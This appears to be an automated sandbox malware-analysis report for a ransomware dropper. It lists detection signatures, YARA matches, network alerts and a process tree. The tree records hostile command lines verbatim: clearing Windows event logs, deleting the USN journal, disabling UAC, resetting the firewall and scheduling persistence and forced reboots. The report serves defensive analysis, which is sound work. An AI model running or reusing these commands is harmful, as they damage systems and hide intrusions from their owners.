Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4W5dQXszUV.exe

Overview

General Information

Sample Name:4W5dQXszUV.exe
Analysis ID:712614
MD5:6ed3e3327246cc457d22bb92bd3bba8b
SHA1:1329a6af26f16bb371782ff404d526eec1af9d22
SHA256:72d4375c5fe2533acb5e378ddbd3c55f87c61003a492caffdcb40db988c49503
Tags:CerberexeRansomware
Infos:

Detection

Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected DeriaLock Ransomware
Yara detected Babuk Ransomware
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Antivirus / Scanner detection for submitted sample
Yara detected Mimikatz
Multi AV Scanner detection for dropped file
Yara detected InfinityLock Ransomware
Creates multiple autostart registry keys
Uses netsh to modify the Windows network and firewall settings
Writes directly to the primary disk partition (DR0)
Contains functionality to register hotkeys which are used to close and control applications (CTRL-ALT-DEL, ALT-F4 etc)
Found Tor onion address
Deletes keys related to Windows Defender
PE file has a writeable .text section
Deletes keys which are related to windows safe boot (disables safe mode boot)
Tries to evade debugger and weak emulator (self modifying code)
Clears the journal log
Uses cmd line tools excessively to alter registry or file data
Machine Learning detection for sample
Clears the windows event log
Performs an instant shutdown (NtRaiseHardError)
Writes many files with high entropy
Connects to many different private IPs (likely to spread or exploit)
Tries to detect virtualization through RDTSC time measurements
Disables the Windows registry editor (regedit)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to create processes via WMI
Drops PE files with benign system names
Opens network shares
Disables Windows system restore
Contains functionality to enumerate network shares of other devices
Changes the view of files in windows explorer (hidden files and folders)
Office process tries to detect installed antivirus files
Disables the Windows task manager (taskmgr)
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Uses ping.exe to sleep
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Infects the VBR (Volume Boot Record) of the hard disk
Modifies the windows firewall
Connects to many different private IPs via SMB (likely to spread or exploit)
Infects the boot sector of the hard disk
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Checks for available system drives (often done to infect USB drives)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Changes the start page of internet explorer
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
PE file contains sections with non-standard names
Hides icons from the desktop
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Changes the window title of internet explorer
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Enables security privileges
Uses taskkill to terminate processes
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

  • System is w10x64
  • 4W5dQXszUV.exe (PID: 4624 cmdline: "C:\Users\user\Desktop\4W5dQXszUV.exe" MD5: 6ED3E3327246CC457D22BB92BD3BBA8B)
    • Endermanch@BadRabbit.exe (PID: 4844 cmdline: "C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 5608 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 2040 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 4312 cmdline: schtasks /Delete /F /TN rhaegal MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 1888 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 189355826 && exit" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 5544 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 189355826 && exit" MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 5284 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:03:00 MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 6128 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:03:00 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • DCD7.tmp (PID: 4688 cmdline: "C:\Windows\DCD7.tmp" \\.\pipe\{2E02CEAC-C329-41B6-9CE1-D678AB93A9A0} MD5: 347AC3B6B791054DE3E5720A7144A977)
          • conhost.exe (PID: 1388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 4396 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • wevtutil.exe (PID: 6520 cmdline: wevtutil cl Setup MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 7512 cmdline: wevtutil cl System MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 8468 cmdline: wevtutil cl Security MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 9420 cmdline: wevtutil cl Application MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • fsutil.exe (PID: 9492 cmdline: fsutil usn deletejournal /D C: MD5: 140A43A2237D7D7497D4E0568B518B71)
        • cmd.exe (PID: 9388 cmdline: /c schtasks /Delete /F /TN drogon MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 9436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 9472 cmdline: schtasks /Delete /F /TN drogon MD5: 15FF7D8324231381BAD48A052F85DF04)
    • Endermanch@Birele.exe (PID: 5216 cmdline: "C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)
      • taskkill.exe (PID: 4852 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Cerber5.exe (PID: 5292 cmdline: "C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)
      • netsh.exe (PID: 5968 cmdline: C:\Windows\system32\netsh.exe advfirewall set allprofiles state on MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5600 cmdline: C:\Windows\system32\netsh.exe advfirewall reset MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6120 cmdline: "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 3812 cmdline: taskkill /f /im "E" MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • PING.EXE (PID: 1900 cmdline: ping -n 1 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
    • Endermanch@DeriaLock.exe (PID: 5380 cmdline: "C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe" MD5: 0A7B70EFBA0AA93D4BC0857B87AC2FCB)
    • Fantom.exe (PID: 1460 cmdline: "C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe" MD5: 7D80230DF68CCBA871815D68F016C282)
    • Endermanch@InfinityCrypt.exe (PID: 3772 cmdline: "C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe" MD5: B805DB8F6A84475EF76B795B0D1ED6AE)
    • Endermanch@Krotten.exe (PID: 7464 cmdline: "C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe" MD5: 87CCD6F4EC0E6B706D65550F90B0E3C7)
    • Endermanch@NoMoreRansom.exe (PID: 9412 cmdline: "C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe" MD5: 63210F8F1DDE6C40A7F3643CCF0FF313)
    • Endermanch@Petya.A.exe (PID: 11368 cmdline: "C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe" MD5: AF2379CC4D607A45AC44D62135FB7015)
    • Endermanch@PolyRansom.exe (PID: 6092 cmdline: "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe" MD5: 3ED3FB296A477156BC51ABA43D825FC0)
      • rCUUIQEQ.exe (PID: 4252 cmdline: C:\Users\user\yeYUggIg\rCUUIQEQ.exe MD5: 2CB01F55AB958092E1595D2C55D6E6DA)
      • wKAwMsck.exe (PID: 4724 cmdline: C:\ProgramData\sWAsokQQ\wKAwMsck.exe MD5: D3481EFA5B26209A8299D0ED2A72FF2E)
      • cmd.exe (PID: 6120 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 9392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Endermanch@PolyRansom.exe (PID: 5824 cmdline: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom MD5: 3ED3FB296A477156BC51ABA43D825FC0)
      • reg.exe (PID: 5572 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 5832 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 5828 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3192 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nKgYAAYU.bat" "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe"" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • Endermanch@WinlockerVB6Blacksod.exe (PID: 3972 cmdline: "C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe" MD5: DBFBF254CFB84D991AC3860105D66FC6)
  • cmd.exe (PID: 3824 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 189355826 && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • dispci.exe (PID: 8456 cmdline: "C:\Windows\dispci.exe" -id 189355826 MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)
      • conhost.exe (PID: 10500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 13300 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 1236 cmdline: schtasks /Delete /F /TN rhaegal MD5: 15FF7D8324231381BAD48A052F85DF04)
  • svchost.exe (PID: 5720 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\cscc.datINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
  • 0x2b3d8:$d1: \DosDevices\dcrypt
  • 0x2b488:$d2: $dcsys$_fail_%x
  • 0x2b468:$d3: %s\$DC_TRIM_%x$
  • 0x2b3b8:$d4: \Device\dcrypt
  • 0x2b420:$d5: %s\$dcsys$
C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
    C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeMALWARE_Win_InfinityLockDetects InfinityLock ransomwareditekSHen
    • 0x2c145:$s3: GenerateHWID
    • 0x2c2c3:$s4: CreateKey
    • 0x2c1b6:$d1: ProgrammFiles
    • 0x2c1ad:$d2: OneDrive
    • 0x2c184:$d3: ProgrammsX86
    • 0x2c1a4:$d4: UserDirs
    • 0x2c1dd:$d5: B_Drive
    • 0x2e834:$pdb1: F:\DESKTOP!\ChkDsk\ChkDsk\obj\
    • 0x2e846:$pdb2: \ChkDsk\obj\Debug\PremiereCrack.pdb
    C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.execerber3Cerber3 pekeinfo
    • 0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
    C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeJoeSecurity_DeriaLockYara detected DeriaLock RansomwareJoe Security
      Click to see the 10 entries
      SourceRuleDescriptionAuthorStrings
      00000005.00000000.332123066.0000000000448000.00000020.00000001.01000000.00000009.sdmpcerber3Cerber3 pekeinfo
      • 0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
      00000015.00000000.345508345.00007FF62952E000.00000008.00000001.01000000.0000000E.sdmpmimikatzmimikatzBenjamin DELPY (gentilkiwi)
      • 0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
      • 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
      • 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
      0000002C.00000000.370824731.0000000000401000.00000020.00000001.01000000.00000015.sdmpRansom_PetyaRegla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015CCN-CERT
      • 0x19c37:$a1: C1 C8 14 2B F0 03 F0 2B F0 03 F0 C1 C0 14 03 C2
      • 0x19c47:$a2: 46 F7 D8 81 EA 5A 93 F0 12 F7 DF C1 CB 10 81 F6
      • 0x19c57:$a3: 0C 88 B9 07 87 C6 C1 C3 01 03 C5 48 81 C3 A3 01 00 00
      00000015.00000000.344932527.00007FF62952E000.00000008.00000001.01000000.0000000E.sdmpmimikatzmimikatzBenjamin DELPY (gentilkiwi)
      • 0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
      • 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
      • 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
      00000015.00000000.345317728.00007FF62952E000.00000008.00000001.01000000.0000000E.sdmpmimikatzmimikatzBenjamin DELPY (gentilkiwi)
      • 0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
      • 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
      • 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
      Click to see the 22 entries
      SourceRuleDescriptionAuthorStrings
      1.2.Endermanch@BadRabbit.exe.880000.1.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
      • 0x6114:$x3: C:\Windows\infpub.dat
      • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
      4.3.rundll32.exe.3363160.2.raw.unpackINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
      • 0x2b3d8:$d1: \DosDevices\dcrypt
      • 0x2b488:$d2: $dcsys$_fail_%x
      • 0x2b468:$d3: %s\$DC_TRIM_%x$
      • 0x2b3b8:$d4: \Device\dcrypt
      • 0x2b420:$d5: %s\$dcsys$
      4.3.rundll32.exe.3363160.0.raw.unpackINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
      • 0x2b3d8:$d1: \DosDevices\dcrypt
      • 0x2b488:$d2: $dcsys$_fail_%x
      • 0x2b468:$d3: %s\$DC_TRIM_%x$
      • 0x2b3b8:$d4: \Device\dcrypt
      • 0x2b420:$d5: %s\$dcsys$
      44.2.Endermanch@Petya.A.exe.4e0000.2.unpackWin32_Ransomware_PetyaunknownReversingLabs
      • 0x84d0:$entry_point: 55 8B EC 56 8B 75 0C 57 83 FE 01 75 17 E8 8E 00 00 00 68 04 B0 4E 00 68 00 B0 4E 00 E8 9F 00 00 00 83 C4 08 FF 75 10 56 FF 75 08 E8 97 F7 FF FF 8B F8 85 F6 75 05 E8 15 00 00 00 8B C7 5F 5E 5D ...
      • 0x83d8:$shutdown_pattern: 55 8B EC 83 EC 1C 8D 45 FC 56 50 6A 28 FF 15 58 A0 4E 00 50 FF 15 04 A0 4E 00 85 C0 75 04 33 C0 EB 68 8D 45 EC 33 F6 50 68 A0 A7 4E 00 56 FF 15 00 A0 4E 00 56 56 56 8D 45 E8 C7 45 E8 01 00 00 ...
      • 0x4ee:$sectionxxxx_pattern: 83 EC 0C 53 55 8B C2 89 4C 24 10 56 57 8B C8 89 44 24 14 33 D2 E8 C8 FF FF FF 85 C0 74 46 0F B7 48 14 8B FA 83 C1 18 03 C8 0F B7 40 06 89 44 24 10 85 C0 74 2F BE 60 A0 4E 00 2B F1 80 39 2E 8D ...
      • 0x533d:$crypt_gen_pattern: 55 8B EC 53 57 8B 7D 14 8D 45 14 68 00 00 00 F0 6A 01 33 DB 53 53 50 89 1F FF 15 0C A0 4E 00 85 C0 75 05 6A C4 58 EB 29 56 FF 75 0C 8B 75 10 56 FF 75 14 FF 15 08 A0 4E 00 85 C0 75 05 6A C4 58 ...
      13.0.Fantom.exe.400000.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        Click to see the 69 entries

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe, ParentProcessId: 4844, ParentProcessName: Endermanch@BadRabbit.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 5608, ProcessName: rundll32.exe
        Timestamp:192.168.2.4185.53.177.5349790802809804 09/29/22-14:46:34.229435
        SID:2809804
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.493.107.12.05856668932023612 09/29/22-14:45:15.538371
        SID:2023612
        Source Port:58566
        Destination Port:6893
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.454.242.4.10149779802849814 09/29/22-14:46:20.244595
        SID:2849814
        Source Port:49779
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.4162.55.0.13749795802824087 09/29/22-14:46:39.871600
        SID:2824087
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.454.242.4.10149779802849813 09/29/22-14:46:20.244595
        SID:2849813
        Source Port:49779
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeAvira: detection malicious, Label: TR/Sirery.A
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeAvira: detection malicious, Label: TR/Ransom.pfnaw
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeAvira: detection malicious, Label: HEUR/AGEN.1240493
        Source: C:\ProgramData\Windows\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1240493
        Source: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeAvira: detection malicious, Label: TR/AD.Skeeyah.ixvmj
        Source: C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
        Source: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeAvira: detection malicious, Label: TR/Ficongur.dngqe
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exeAvira: detection malicious, Label: TR/Ransom.JB
        Source: 4W5dQXszUV.exeReversingLabs: Detection: 64%
        Source: 4W5dQXszUV.exeVirustotal: Detection: 61%Perma Link
        Source: 4W5dQXszUV.exeMetadefender: Detection: 24%Perma Link
        Source: 4W5dQXszUV.exeAvira: detected
        Source: C:\ProgramData\Windows\csrss.exeReversingLabs: Detection: 90%
        Source: C:\ProgramData\Windows\csrss.exeMetadefender: Detection: 72%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeReversingLabs: Detection: 90%
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeMetadefender: Detection: 72%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeReversingLabs: Detection: 62%
        Source: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeMetadefender: Detection: 45%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeReversingLabs: Detection: 96%
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeMetadefender: Detection: 86%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exeReversingLabs: Detection: 95%
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exeMetadefender: Detection: 88%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeReversingLabs: Detection: 85%
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeMetadefender: Detection: 60%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeReversingLabs: Detection: 45%
        Source: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeMetadefender: Detection: 31%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exeReversingLabs: Detection: 92%
        Source: C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exeMetadefender: Detection: 62%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\h21abmmw.gcd\Endermanch@AnViPC2009.exeReversingLabs: Detection: 67%
        Source: C:\Users\user\AppData\Local\Temp\h21abmmw.gcd\Endermanch@AnViPC2009.exeMetadefender: Detection: 24%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\ihramkff.aqi\Endermanch@ViraLock.exeReversingLabs: Detection: 95%
        Source: C:\Users\user\AppData\Local\Temp\ihramkff.aqi\Endermanch@ViraLock.exeMetadefender: Detection: 82%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\iptzuyxi.lvf\Endermanch@FakeAdwCleaner.exeReversingLabs: Detection: 70%
        Source: C:\Users\user\AppData\Local\Temp\iptzuyxi.lvf\Endermanch@FakeAdwCleaner.exeMetadefender: Detection: 60%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeReversingLabs: Detection: 95%
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeMetadefender: Detection: 81%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\kql13vqd.ufc\Endermanch@AntivirusPlatinum.exeReversingLabs: Detection: 77%
        Source: C:\Users\user\AppData\Local\Temp\kql13vqd.ufc\Endermanch@AntivirusPlatinum.exeMetadefender: Detection: 28%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeReversingLabs: Detection: 86%
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeMetadefender: Detection: 77%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeReversingLabs: Detection: 90%
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeMetadefender: Detection: 75%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\qfvdb0vr.1x3\Endermanch@Antivirus.exeReversingLabs: Detection: 85%
        Source: C:\Users\user\AppData\Local\Temp\qfvdb0vr.1x3\Endermanch@Antivirus.exeMetadefender: Detection: 60%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeReversingLabs: Detection: 92%
